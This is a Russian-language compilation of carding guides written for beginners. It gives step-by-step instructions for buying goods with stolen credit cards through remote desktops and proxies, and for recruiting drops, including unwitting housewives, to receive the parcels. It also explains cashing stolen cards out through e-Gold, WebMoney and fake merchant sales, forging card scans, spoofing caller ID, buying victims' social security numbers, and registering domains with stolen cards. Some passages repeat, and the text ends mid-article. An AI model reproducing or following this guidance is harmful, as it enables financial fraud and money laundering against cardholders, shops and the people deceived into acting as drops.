Основные заблуждения.
1. Хочу все и сразу.
Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь все есть. Также статейка по общим понятиям по заливам есть.
2. Безопасность. Меня посадят.
Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнет зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, причем используешь не сокс, а именно дедик, который имеет наибольшую анонимность.
Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, ВПН - это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.
3. Легкие деньги.
Возможно, ты уже знаешь, что все продавцы дампа+пина это все лохотрон. А если нет, то предупреждаю деньги за деньги никто не продает, чудеса возможны только в стране дураков.
Предисловение. Куда можно вбить и как на этом заработать.
1. Шопы. Плюсы: относительно легко найти шлющий шоп. Минусы: шопы быстро помирают, маленький % чистого дохода от вбива. Как искать шопы и как анонимно принимать стаф есть в материалах.
2. Свой мерчант счет. Плюсы: доход от вбива до 95%. Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом. Как открыть свой мерчант счет есть в материалах.
3. Брокерские конторы, типа форекс и биржи. Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счет на дропа с таким, же именем и фамилией, как у холдера и слить все деньги на дропа.
4. Покер аккуанты и конторы со ставками на спорт. Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. Тема по выводу есть в материалах.
5. Мобильные операторы. Скажу сразу, что в СНГ операторов вбить не получится, не спорю такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.
6. Онлайн игры. На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счет игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пайпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.
7. Платежные системы. Не стоит вбивать в пайпел, хотя бы, потому что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы (скрил) эта платежка больше себя позиционирует для оплаты товаров и услуг, нежели для расчетов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.
8. Остальное. Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. 1 правило вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.
Поздравляю тебя, ты сделал верный шаг на встречу к большим деньгам. Можно было полгода и более потратить на самообучение, ни один раз обжечься и начать зарабатывать деньги или вовсе разочароваться и бросить это дело. А можно прочесть эту статью до конца, осознать все и не просто хорошо зарабатывать, а начать косить бабло.
Когда человек далекий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с одно СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. все упирается в лимиты.
Деньги с СС можно перевести на счет казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в следующих статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрет на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе все накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.
Забегая вперед, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдергивают логи с банковскими аккуантами и сливают на своих дропов, а все то, что продают это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идет транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.
Теперь спустимся на более реальную землю, заливы это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десяток долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп, это по сути одна тема по сливу, если задрочить помрет также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый, это отсев, подробнее можно прочить в статье ищем шоп, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлет ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берем не по верхней планке. 600$ - усредненная стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.
Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги
.
Но в итоге все сводится к одному - извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить кредитную карту в WM и поиметь много $?»
Способ № 0 - продажа
Самый элементарный способ – продажа кредитных карточек. Его можно даже назвать примером “cс to WM”. Ты даешь кредитную карточку - тебе тут же перечисляют практические легальные деньги.
Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3. Очень небольшие деньги, если учесть, что на кредитной карте может лежать до нескольких тысяч долларов, которые ты впоследствии сможешь тратить практически как заблагорассудится. Пусть не все, но какую-то часть тебе наверняка удастся извлечь. Как? Об этом я тебе сегодня расскажу.
Способ №1 – перевод
Давай посмотрим, как осуществить перевод денег «СС > E-Gold > WM» (кредитная карта – ЭПС «E-Gold» - WebMoney). Дело в том, что E-Gold деньги ты сможешь купить прямо с кредитной карты, а их уже без проблем можно перевести на WM, обменников сейчас в Сети очень много (их список можно найти, например, на www.golddirectory.com), главное - выбрать подходящие тебе проценты. Конечно, здесь есть и сложности - у тебя могут попросить подтверждение по телефону, скан карты и документа, удостоверяющего личность. В этом случае, если ты не кардхолдер, деньги получить очень непросто.
Происходит все так. Ты ищешь на вышеуказанном сайте обменники, которые принимают кредитные карточки. Вбиваешь креду, указывая, сколько денег тебе нужно перевести с твоей карты на аккаунт в системе E-Gold. Ждешь несколько часов или, иногда, дней. Затем, если все проходит успешно - открываешь свой e-gold-аккаунт и удивляешься лежащей там сумме. Но не все так просто, как кажется. Кардхолдер (хозяин креды) обязательно сделает чардж–реверс (возврат денег), когда увидит, что проклятый кардер нагло спер его честно заработанные деньги. Ребята из обменника отпишут в E-Gold – «помогите, нас ограбили». И твой E-Gold-аккаунт закроют вместе с деньгами. Так что очень важно успеть еще эти деньги отмыть. Есть люди, которые этим занимаются – ты шлешь им нелегальные деньги со своего аккаунта, а они отправляют тебе легальные WebMoney.
Ты можешь возразить: мол, можно найти обменник E-GOLD > WM и быстренько самому обменять, чтобы не платить процент (и немалый) от ворованных денег нальщику (так зовут этого самого посредника). Но имей в виду, что вскоре этот обменник – после того, как E-Gold заберет у него деньги – свяжется еще и со службой поддержки WebMoney и потребует вернуть деньги. WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper. В общем, девиз любого кардера - “Хочешь жить, умей вертеться”.
Способ № 2 – отмыв через аукцион
Идем на интернет-аукцион www.molotok.ru и выкладываем там лот: "Домен + хостинг за XX $ в год! Оплата по WM". Потом, когда появятся покупатели, начинаем покупать по чужим кредам домены и хостинг на www.webhosting.com и продавать за XX $ покупателям с аукциона.
Казалось бы, все просто. Но через некоторое время после продажи домены и хостинги… накроются. Почему? Да все потому же - кардхолдер потребует вернуть украденные деньги, банк заберет деньги у ВорлдХостинга, который, в свою очередь, прикроет домены. Получается, что твои покупатели выбросили деньги на ветер, а ты стал кидалой. Не здорово, правда?
Способ №3 – партнерские программы
Для того чтобы осуществить этот способ, нам придется найти партнерские программы, которые платят за клики или показы баннеров. Делаем сайт, где выкладываем эти самые баннеры и скрипты спонсоров, покупаем много-много трафика на сс. И - ждем свои WM.
Тут, думаю, все шоколадно. Но контент твоего сайта должен быть солидным, чтобы не привлекать внимание службы поддержки партнерских программ. Ведь они собираются тебе платить, и если твой сайт будет представлять собой кашу из невразумительного текста и подозрительного дизайна, а счетчики будут показывать тысячи посетителей ежедневно, то это вызовет справедливые подозрения. Что может привести к закрытию твоего акка. Этому способу посвящена целая статья этого номера, поэтому я не буду останавливаться на нем подробно.
Способ №4 – Задай себе вопрос за деньги
Наш путь лежит на swapsmarts.com, в раздел «эксперт». Для реализации этого способа надо взять кучу карт без кода, создать аккаунты на этом сайте и задавать себе (как эксперту) вопросы из разных категорий. Каждый вопрос стоит определенную сумму (ее ты требуешь сам). За 2-3 вопроса в день вполне может набежать 10-20 долларов, и так – постоянно. При выводе придется попросить выслать чек, а при обнале - попросить перевести на WM. Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.
Способ №5 – Поторгуйся сам с собой
Что нам мешает покупать домены на cc и продавать их уже за WM? Существует много сайтов, где продают готовые проекты или солидные эксклюзивные шаблоны для сайтов. Их тоже можно покупать на сс и продавать через выгодную тебе платежную систему.
Торговать с самим собой можно и другим способом. К примеру, сделать РЕАЛЬНЫЙ сайт по продаже какого-нибудь сервиса или софта. Сайт должен быть именно реальный, чтобы мерчант мог это проверить и ничего не заподозрить. Затем – регистрируем аккаунт у мерчанта, ставим невысокую цену, устанавливаем все у себя на сайте. Осталось только раскрутить сайт, купить трафик за СС, и, когда у тебя наберется достаточно посещений, можно начинать покупать у самого себя, только в разумных пределах и анонимно, опять же - мерчант не должен ничего заподозрить. Таким образом можно сделать пару сайтов и потихоньку работать. Главное - не переборщить и знать меру. Потом, естественно, получить сокровенные WM, если мерчант позволяет такую услугу, или, получив чек, перевести его во все те же WM.
Способ №6 – рекламируй свои услуги
Достаточно простой, на мой взгляд, способ. Для его осуществления тебе нужно каким-то образом разрекламировать услугу: "Делаю хостинг с доменным именем для сайтов for life за n webmoney". А потом, после каждого заказа, заполнять маленькую форму на www.hostonce.com и вписывать туда свои креды. На hostonce практически не проверяют cc, и сайт никогда не закроют. А на следующий день тебе останется получить свои “честно” заработанные webmoney. Разумеется, за отлично исполненный заказ.
Способ №7 – Задорно, но не порно?
Главное здесь – найти через какой-нибудь поисковик (например, google.com) Adult-спонсоров, которые предоставляют уже готовый магазин (к примеру,www.sextoyfun.com).
Эти спонсоры дают тебе процент с продаж с твоего (точнее, предоставленного тебе) сайта и платят за привлечение рефералов. Остается только прикинуться порноманьяком - вбить карты на своем шопе. Потом, уже в роли порнопродавца, заказать чек через Western Express на WebMoney (если спонсор не работает сразу через WM).
У этого способа есть неоспоримый плюс – не надо ничего делать. Ни тебе сайтов, ни подключения к биллингам. Но есть и минус - обычно дают не больше 25% с продажи.
Заключение
Я описал далеко не все способы обналички денег с кредиток. А вот заниматься кардингом или нет - это дело лично каждого. Могу лишь посоветовать не быть назойливым, иметь терпение, читать умные книжки и, разумеется, наши статьи.
Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3.
WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper.
Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.
На hostonce практически не проверяют cc, и сайт никогда не закроют.
Вбив.
Скардить товар не намного сложнее, если покупать его за свои деньги. По сути скопировал данные сс, вставил в окошки и профит, ничего сложного, это так и есть, а теперь ближе к делу.
Что нужно для успешного вбива?
- Материал. СС и Дедик, дедик берем сразу под штат СС.
- Шоп. Шопы шлют ВСЕ, иначе интернет-магазинов просто бы не существовало. Отличие лишь в том, что к каждому нужен свой подход, одни не шлют в отдельные страны вовсе, другие не шлют на большие суммы, третьи не шлют, потому что сс без vbv кода и т.д.
По шагам.
1. Покупаем СС, лучше без vbv кода. На заметку: 1. Есть шопы, которые не просят vbv код, даже если СС с кодом. 2. Если вбивать электронику, то с вероятностью 98% без vbv кода вбить СС не прокатит, т.е. придется покупать только с vbv.
2. Покупаем дедик под штат СС.
3. Ищем шоп. Если есть шоп, пункт пропускаем. Хитрости поиска шопов есть в материалах.
4. Регистрируем почту. Регистрируем в зоне com, с абстрактным названием чтобы сошло для женщины и для мужчины, например, watercould98, likechokоlade и т.п.
5. Заходим на дедик.
6. Вбиваем. ну и все) Важный момент шипинг и билинг адресов. Здесь нужно экспериментировать или узнавать у саппорта шлет ли на отличный биллинг или нет. Есть шопы, в которых указываешь одинаковый билинг и шипинг адрес причем сразу дропа, данные сс не меняешь, т.е. идет соответствие адресов, но нет проверки адреса и холдера. Самые удобные шопы для вбива)
Чтобы шоп слал на одного дропа несколько раз можно менять местами имя и фамилию, делать 2-3 ошибки в имени, также указываем адрес соседа.
Любые проблемы лучше решать, написав сразу саппорту, что и почему не проходит оплата, они ответят и если повезет, за тебя сами проведут оплату.
Вещевой кардинг
Вещевой кардинг получил наибольшее распространение среди кардеров. Его суть заключается в заказе товаров в интернет-магазинах по чужим кредитным картам с целью последующего сбыта.
Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко. Чтобы получать доход, нужна цепочка людей, которые будут слаженно работать.
Как закалялась сталь
В середине 1990-х годов никто еще не слышал о махинациях с кредитными картами, а редкие случаи пропажи денег были ошибками магазинов и банков. Поэтому непуганые интернет-магазины охотно принимали несуществующие сгенерированные кредитные карты, алгоритм которых был таким же, как и у настоящих карт. Проверив алгоритм, интернет-магазины высылали заказанный товар. Обман вскрывался только в конце месяца, когда магазины запрашивали у банков перевод денег с карт на оплату товара. Естественно, что денег магазин не получал, так как запрошенных кредитных карточек просто не существовало в природе.
В это время в странах СНГ стало возможным получить доступ к интернету. Первыми пользователями были в основном преподаватели и студенты вузов. Эти студенты и составляли основу зарождающегося кардерства СНГ. Голодные студенты кардили все, что только можно, делая упор на электронику и ювелирные изделия. Особым рвением отличались украинские кардеры, которые организовали в Киеве целую сеть по транспортировке, хранению и сбыту накарженного. Десятки квартир покупались под склады для хранения электроники, которую не успевали сбывать по бросовым ценам. На таможенном терминале в киевском международном аэропорту Борисполь круглосуточно дежурили несколько грузовиков, вывозивших груз после каждого международного рейса. Таможенники, быстро оформлявшие прибывшие грузы, тоже в накладе не оставались. Товар из европейских магазинов в основном доставлялся наземным путем. Объем товара был настолько велик, что нередко магазины отправляли свои фуры прямо на Украину, не прибегая к услугам почты. Многие магазины всерьез задумались об открытии своих филиалов в СНГ.
Товар сбывался по подложным документам через оптовые и розничные магазины, которые были заинтересованы в покупке фирменной электроники по низким ценам. Огромный поток скарженной электроники привел к затовариванию украинского рынка. Сложилась парадоксальная ситуация, когда можно было купить оперативную память по цене в два раза дешевле отпускной цены производителя. Легальные поставки электроники, особенно компьютеров, практически прекратились.
Сказка не могла длиться вечно. ФСБ совместно с Интерполом уже некоторое время следили за вызывающей деятельностью кардеров. В 1996 году по Украине, России и Белоруссии прокатилась волна арестов. Главари кардерских группировок и их приближенные были арестованы. О дальнейшем существовании таких сообществ не могло быть и речи, теперь каждый был сам за себя. Товар старались сбыть сразу после получения, работали в основном поодиночке или небольшими группами, не привлекая лишних людей.
Палки в колеса
Долго такой беспредел продолжаться не мог. Из-за действий кардеров очень многие интернет-магазины разорились. Оставшиеся магазины объявили страны СНГ вне закона и перестали слать в СНГ товар. Причем даже по легальной кредитной карте заказать что-то в иностранных магазинах жителям СНГ было очень и очень трудно. В то время мой знакомый заказал в европейском интернет-магазине по своей кредитке какую-то редкую книгу. После заказа ему позвонили из магазина и попросили назвать все реквизиты его кредитной карточки. Потом попросили выслать отсканированную с двух сторон кредитку. И когда все требования магазина были выполнены, оттуда после недели раздумья пришел ответ, что по техническим причинам товар не может быть выслан. Такие пироги.
Многие думали, что это конец недолгой жизни вещевого кардинга, но выход был найден. Если они не шлют нам, то будут слать в свою страну! Теперь кардеры искали иностранца, который бы принимал товар и за вознаграждение пересылал его в СНГ либо продавал у себя на родине, высылая часть денег (а часть себе в карман). С тех пор кардеры специализируются по регионам: США, Великобритания или Европа. При этом, например, европейские магазины без проблем шлют товар в пределах Европы, в том числе и в такие близкие нам страны, как Латвия, Болгария и даже Украина.
Следующим ударом по кардерскому ремеслу стал постепенный отказ в приеме сгенерированных кред. В связи с большими убытками магазинов, у банков появились новые сервисы, позволяющие магазину проверять достоверность данных о кредитной карте на лету или в разумные сроки (раньше магазин узнавал, что его надули, уже после того, как покупка отправлялась заказчику). И теперь магазин мог отсеять несуществующую кредитку еще до отсылки товара. Но и эту преграду удалось преодолеть. Из-за несовершенства защиты интернет-магазинов можно было утянуть у них базу данных с информацией о кредитных картах клиентов, делавших у них покупки.
С этого момента многие добропорядочные американцы боялись делать покупки в интернет-магазинах. И правильно делали. Каждый магазин уверяет покупателей, что у него самая надежная защита. Но было бы намного лучше, если бы магазины просто не хранили информацию о покупателях у себя на сервере. Иногда можно, введя в поисковике что-нибудь типа "credit card name adress", выйти на список кредитных карт, который хранится на сервере интернет-магазина. То есть информация о кредитных картах в этом случае настолько незащищена, что даже индексируется поисковыми системами! Теперь, когда в магазине делали заказ по существующей карте, он снимал с нее деньги (или просто проверял ее существование, а деньги снимал в конце месяца). Через некоторое время настоящий владелец карты обращался в банк и опротестовывал транзакцию. Банк, в свою очередь, разбирался с магазином. Но поезд ушел, товар выслан, а магазин опять в дураках.
Новым шагом в защите от фрауда стал запрос магазинами кода cvv2 при покупке. Тут уж думали, что кардингу пришел конец. Фишка здесь в том, что этот код - 3 последние цифры номера на задней стороне карты, знать его может только владелец карты, который держит ее в руках. Теперь любые махинации с кредитными картами стали в принципе невозможны, так как код cvv2 узнать нельзя никак. Изначально планировалось, что cvv2 не будет сохраняться ни на какой стадии обработки кредитной карты. То есть он сообщался только банковской системе обработки карт, а уже из банка шло подтверждение или отказ. Но хотели как лучше, а получилось как всегда. Интернет-магазины, нарушая все требования банков, стали сохранять код cvv2 со всей остальной информацией о кредитных картах в своих базах данных. Ну, а базы, в свою очередь, так же спокойно, как и раньше, воровались, а кардеры получали доступ к cvv2. Все вернулось на круги своя. И пенять интернет-магазинам оставалось только на себя.
Вещевой кардинг сегодня
Сейчас вещевой кардинг переживает не лучшие времена, но и сдавать позиции не собирается. Наблюдается некое равновесие среди покупок в интернет-магазинах: с одной стороны, потери интернет-магазинов на кардерских заказах покрываются прибылью с легальных покупок, с другой стороны, этих заказов хватает кардерам, чтобы свести концы с концами и не умереть с голоду. Сегодня вещевой кардинг продолжает оставаться популярным среди новичков, хотя некоторые и разочаровываются в нем, забывая про кардинг навсегда.
Анонимность и безопасность
Главное, на что стоит обратить внимание, это безопасность и анонимность при занятии вещевым кардингом. При заказе товара в интернет-магазине специальные скрипты могут узнать дополнительную информацию о пользователе. Так, например, если ты работаешь с американскими интернет-магазинами, то и твой компьютер должен выглядеть как компьютер типичного американца. Это значит, что установленная операционная система должна быть от начала и до конца английской - магазин может насторожить даже наличие русского языка для ввода с клавиатуры. Твой часовой пояс должен быть не просто американским, а соответствовать локальному часовому поясу твоего дропа (человека, который получает товар из магазина и пересылает тебе). При заказе в интернет-магазине обязательно использование анонимного proxy-сервера. И крайне желательно, чтобы IP этого proxy-сервера соответствовал штату твоего дропа, а еще лучше городу.
Практические советы
Тебе также следует знать, что настоящий американец совершает покупки в интернет-магазине либо во время обеденного перерыва на работе, либо вечером у себя дома. Соответственно, в эти часы интернет-магазины получают больше всего заказов, и у твоего заказа будет меньше шансов привлечь внимание менеджеров магазина. Отдельно стоит упомянуть покупки подарков на Рождество и другие праздники. В этот период с виртуальных полок интернет-магазинов покупатели метут все подряд, раскупается даже самый залежалый товар. Интернет-магазинам на этот период приходится нанимать дополнительных работников. Также стоит обратить внимание на официальные выходные в той стране, на которой ты специализируешься. Заказы, сделанные в праздничные дни, будут обработаны только через несколько дней, а эта задержка может стать роковой, так как у владельца карты будет время, чтобы опротестовать платеж.
Кредитную карту для покупки в интернет-магазине следует подбирать очень тщательно. Карта должна соответствовать штату, а лучше городу твоего дропа, тогда можно попробовать указать при заказе разные адреса дропа и владельца карты и постараться убедить магазин, что ты (как владелец карты) решил сделать подарок своему племяннику на другом конце города. Если есть возможность, лучше купить карту с онлайн-доступом. В таких картах можно заходить на сайте банка в специальный раздел и менять там адрес держателя карты. Если адрес сменить на адрес дропа, то у магазина в принципе отпадут всякие сомнения в легальности покупки, так как он высылает покупку на адрес держателя карты. Но и тут все не так просто. Дело в том, что смена адреса держателя карты очень схожа с шаманством и плясками с бубном вокруг костра. Иногда адрес на карте меняется без вопросов, а иногда банк начинает сомневаться и ничего не получается. Кстати, многие кардеры очень суеверные люди.
Интернет-магазин, в котором будет сделан заказ, также надо тщательно подбирать. Не стоит делать заказ в больших интернет-магазинах с хорошей службой безопасности. Надо выбрать небольшой интернет-магазин, который обычно является лишь интернет-витриной обычного магазина. Доля покупок через интернет в таком магазине очень мала, поэтому нет квалифицированного персонала, отслеживающего покупки кардеров.
Если интернет-магазину что-то кажется подозрительным, он может потребовать выслать ему отсканированную кредитную карточку или спросит твой телефон, либо предложит тебе самому позвонить в магазин. Скан кредитной карты наши умельцы тебе за несколько десятков баксов сделают такой, что будет лучше оригинала, а вот с телефоном придется помучиться. Можно договориться со своим дропом о подтверждении по телефону, можно найти отдельного человека. И если с дропом все просто, то отдельный человек может жить в другом штате. Тогда придется пользоваться антиАОНами, которые подменят номер телефона на тот, который будет соответствовать штату дропа.
В последнее время стала очень актуальной тема по интернет-магазинам Австралии и Новой Зеландии. Из-за их отдаленности от других стран там существует лишь немногочисленный местный вещевой кардинг, который контролируется китайской мафией. Поэтому магазины без лишних вопросов шлют товар не только по своим странам, но и за границу, даже в Россию. Правда, срок доставки в Россию намного больше, чем из Америки, из-за хуже развитых служб почтовой доставки. Еще одной проблемой является добыча австралийских и новозеландских кредитных карт. Из-за того, что из этих стран мало кто кардит, очень малое количество карт можно приобрести. А если у продавца и появляются австралийские кредитки, то по ценам в несколько раз больше американских или европейских.
Ох уж эти дропы
Если магазин все-таки выслал товар, то все равно еще рано пить шампанское и праздновать победу, так как между тобой и товаром есть еще дроп. Очень часто дропов берет ФБР, а иногда сами дропы могут тебя кинуть. В найме дропа есть два пути. Первый - с самого начала все ему рассказать, чтобы он знал, на что идет. В этом случае он сможет подтверждать заказы по телефону и всячески способствовать получению товара. Либо можно найти какую-нибудь домохозяйку, которая за несколько сотен в месяц будет не прочь подработать получением и пересылкой посылок. Но у этого пути есть куча минусов. Домохозяйка, будучи существом глупым, может делать такие вещи, которые ты себе и представить не сможешь. Например, был случай, когда на адрес такого вот дропа пришла посылка, но из-за того, что дропа несколько раз не заставали дома, посылку отправили обратно в магазин. И это при том, что время прихода почтальон каждый раз согласовывал с домохозяйкой по телефону! Но даже когда товар благополучно получен дропом и выслан тебе, радоваться все еще рано. Бывали случаи, когда дроп путал адрес, и посылка отправлялась обратно. Радоваться будешь, когда товар будет уже у тебя в руках.
А как же Россия?
Многих, наверное, мучает вопрос о российских интернет-магазинах. Сам факт кардинга из российских магазинов подразумевает использование кредитной карты нашего соотечественника. Среди кардеров существует негласное правило - не трогать своих. И если на кардерских форумах проскакивает объявление о продаже базы с русскими кредитками, то оно сразу удаляется. Еще одна причина - бдящие службы безопасности интернет-магазинов, тесно сотрудничающие с правоохранительными органами. И если, кардя товар из американских магазинов, кардер может не беспокоиться, что из-за нескольких ноутбуков его объявят в международный розыск, то ФСБ по наводке российского интернет-магазина быстро найдет мошенника.
Бесконечная история
Несмотря ни на что, кардинг продолжает жить. И на каждую новую уловку магазинов найдется свое средство. Главное помнить, что все, в конечном счете, зависит от менеджера интернет-магазина, который занимается твоим заказом. Был у меня случай, когда магазин не захотел мне высылать товар, требуя телефонного звонка. Тогда я написал им жалобное письмо, что сейчас не имею доступа к телефону, а цифровой фотоаппарат предназначается моему сыну, у которого через три дня день рождения. А подарок как раз тот, о котором сын давно мечтал. Я попросил выслать покупку и пообещал, что обязательно позвоню в магазин через неделю. И это сработало! Так что никогда не стоит забывать про человеческий фактор.
Схема вещевого кардинга
Кардер, предварительно организовав свою безопасность и анонимность в Сети, делает заказ в интернет-магазине.
Магазин может попросить позвонить и/или выслать отсканированную кредитную карту. Скан кредитки рисует специальный человек. Звонок в магазин тоже делается человеком с антиАОНом, чтобы все выглядело, как будто звонит законный владелец карты.
Магазин высылает покупку твоему человеку (дропу) в стране, где находится интернет-магазин.
Дроп продает товар на месте, оставляя часть денег себе, либо пересылает товар тебе.
Кредитки с онлайн-доступом
Многие американские банки предоставляют своим клиентам доступ к информации о кредитной карте на банковском сайте. Введя на сайте номер карты и пароль, клиент может посмотреть статистику транзакций, изменить адрес и т.п. На самом деле из любой кредитной карты соответствующего банка можно сделать карту с онлайн-доступом. Для этого надо, кроме информации о кредитной карте, знать лишь номер социального страхования ее владельца, который известен только ему самому. Но в интернете можно найти людей, которые имеют доступ к базам данных с номерами социального страхования. И за 5-10 баксов они по имени владельца карты выдадут тебе номер социального страхования.
Proxy-серверы
Лучше всего proxy-серверы покупать, тогда ты сразу получаешь именно тот сервер, который тебе нужен. Но если ты начинающий кардер и денег у тебя немного, то можно взять адреса серверов на сайтах, посвященных компьютерной безопасности (www.void.ru, например). Отсортировать сервера по штатам и городам поможет программа Proxy Checker. Теперь, когда ты нашел сервер нужного тебе штата, подставь адрес и порт сервера в свой браузер.
Чтобы убедиться в своей анонимности, зайди на www.privacy.com и просмотри путь пакетов от сервера privacy.com. Последним адресом пакетов должен быть твой proxy-сервер.
Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко.
Самый правильный хостинг
Любой кардер должен иметь ряд незаменимых вещей. Это кредитка, хороший хостинг (чтобы дурить наивных буржуев) и, конечно же, домен. Домен - это не пустой звук и предмет понтов. Именно звучное имя проекта притягивает к себе новых клиентов и вызывает уважение к его владельцу. Разумеется, чтобы не иметь никаких проблем после регистрации домена, следует уделить большое внимание двум вещам. Во-первых, названию домена, которое, как я уже сказал, имеет огромное значение. А во-вторых, грамотно выбрать хостинг, который предоставит любителю картона заветное имя второго уровня. Если первый пункт останется на совести кардера, то со вторым тебе поможет разобраться эта статья.
Сказание о хостингах
Как уже было сказано, необходимо выбрать хороший хостинг, чтобы зарегистрировать домен. Компании, предоставляющие подобные услуги, делятся на несколько видов: те, которые прописывают имя на собственном сервере и предоставляют владельцу определенные права (FTP/WEB/SSH доступ), а также дающие только зону для домена. При этом первичный и вторичный DNS-серверы должны являться собственностью клиента. Существует и третий вариант - золотая середина, хостинг, позволяющий переносить зоны на другой DNS-сервер. Таким является знаменитый www.verio.net. Об этой компании и пойдет речь в этой статье.
Вообще, альтернатив Verio очень много - тот же www.register.com. Но все они, как правило, замораживают домен при отрицательном балансе на кредитке. В случае с Верио этого не происходит - домен умирает лишь по истечении периода существования зоны. А его, как известно, можно продлить без особых проблем. К тому же, если бабки на карте закончатся, Verio оставит клиенту не только домен, но и панель управления, где можно выполнить ряд действий: изменить зону, добавить почтовый аккаунт, выполнить апгрейд плана, посмотреть статистику и многое другое. Об этом я обязательно расскажу, но всему свое время.
Регистрация - дело тонкое
Итак, ты проникся и захотел стать клиентом Verio. Ты выбрал правильный путь, ведь если домен будет зарегистрирован с учетом следующих советов, никаких проблем не будет. Для успешной регистрации тебе понадобится рабочая (читай - с положительным балансом) кредитная карта с наличием cvv2 (специального защитного кода) и немного терпения. К слову о кредитке, совсем недавно Verio была чуть ли не единственной компанией, регистрирующей домены без cvv2-кода. Теперь все изменилось, и в форму было добавлено соответствующее поле. Но такому кардеру, как ты, достать cvv2, я думаю, будет несложно.
На главной странице с правой стороны ты увидишь небольшую форму. Вводи туда желаемое имя домена и жми "Check it". Тебя перекинет на первую ступень регистрации - выбор домена. В случае если имя будет свободно, появится сообщение, иначе высветится форма для выбора альтернативного домена.
